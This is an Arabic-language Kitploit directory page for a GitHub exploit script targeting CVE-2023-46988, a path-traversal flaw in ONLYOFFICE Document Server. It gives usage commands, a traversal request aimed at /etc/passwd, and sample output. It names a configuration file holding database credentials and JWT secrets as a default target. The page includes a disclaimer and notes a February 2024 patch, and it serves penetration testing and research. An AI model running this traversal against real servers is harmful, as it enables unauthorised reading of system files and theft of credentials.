Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
OnlyOffice-path-traversal — CVE-2023-46988: ONLYOFFICE استغلال اجتياز المسار | Kitploit
أدوات/GitHubGitHub/mihat2/onlyoffice-path-traversal
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubmihat2/onlyoffice-path-traversal

OnlyOffice-path-traversal

CVE-2023-46988: ONLYOFFICE استغلال اجتياز المسار

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ONLYOFFICE استغلال traversl المسار في (CVE-2023-46988)

📌 نظرة عامة

يستغل هذا النص البرمجي ثغرة اجتياز المسار في ONLYOFFICE Document Server (CVE-2023-46988) التي تسمح للمستخدمين غير المصرح لهم بنسخ ملفات تعسفية من الخادم. توجد الثغرة في نقطة النهاية /example/editor، حيث يمكن التلاعب بمعامل fileExt للوصول إلى ملفات النظام والإعدادات الحساسة.

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة لأغراض البحث الأمني التعليمي والمصرح به فقط.
الاستخدام غير المصرح به ضد الأنظمة دون إذن صريح غير قانوني وغير أخلاقي.

🛠 الميزات

  • استرداد الملفات الحساسة الافتراضية:
    • /etc/passwd
    • /etc/onlyoffice/documentserver/local.json (يحتوي على بيانات اعتماد قاعدة البيانات وأسرار JWT)
  • تحديد أي مسار ملف لاسترداده باستخدام الوسيط --file.
  • دعم الوكيل الاختياري لاعتراض Burp Suite (--proxy).
  • دعم التحقق من SSL الاختياري (--verify).
  • إصلاح مشكلات الترميز عند تنزيل الملفات التي تحتوي على أحرف خاصة.

🚀 الاستخدام

1️⃣ الاستخدام الأساسي (استرداد الملفات الافتراضية)

root@kitploit:~
python onlyoffice_exploit.py http://localhost

يسترد هذا:

  • /etc/passwd
  • /etc/onlyoffice/documentserver/local.json

2️⃣ استرداد ملف مخصص (مثل /etc/hosts)

root@kitploit:~
python onlyoffice_exploit.py http://localhost --file /etc/hosts

3️⃣ تفعيل الوكيل (مثل Burp Suite على 127.0.0.1:8080)

root@kitploit:~
python onlyoffice_exploit.py http://localhost --proxy
root@kitploit:~
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080

4️⃣ تفعيل التحقق من SSL

root@kitploit:~
python onlyoffice_exploit.py https://example.local --verify

5️⃣ الجمع بين الوكيل والتحقق من SSL

root@kitploit:~
python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify

🔍 كيف يعمل

  1. يرسل طلبًا إلى /example/editor بمعامل fileExt ضار:
    root@kitploit:~
    GET /example/editor?fileExt=../../../../../../../../etc/passwd
    
  2. يستخرج URL إعادة التوجيه من الاستجابة.
  3. يحلل اسم الملف المعاد توجيهه من الاستجابة.
  4. يصلح مشكلات الترميز للأحرف الخاصة في أسماء الملفات.
  5. ينزل الملف من /example/download?fileName=<extracted_filename>.

🛠 مثال على الإخراج

root@kitploit:~
[*] Target URL: http://localhost
[*] Attempting to retrieve: /etc/passwd
[*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
[+] Extracted File Name: .passwd
[*] Downloading file: http://localhost/example/download?fileName=.passwd
[+] File downloaded successfully: .passwd

🔒 التخفيف

قامت ONLYOFFICE بإصلاح هذه الثغرة في تحديث فبراير 2024.
يجب على المستخدمين التحديث إلى أحدث إصدار لحماية خوادمهم.

🐜 الترخيص

هذا المشروع مرخص بموجب رخصة MIT – راجع ملف LICENSE للحصول على التفاصيل.

تنزيل الأداة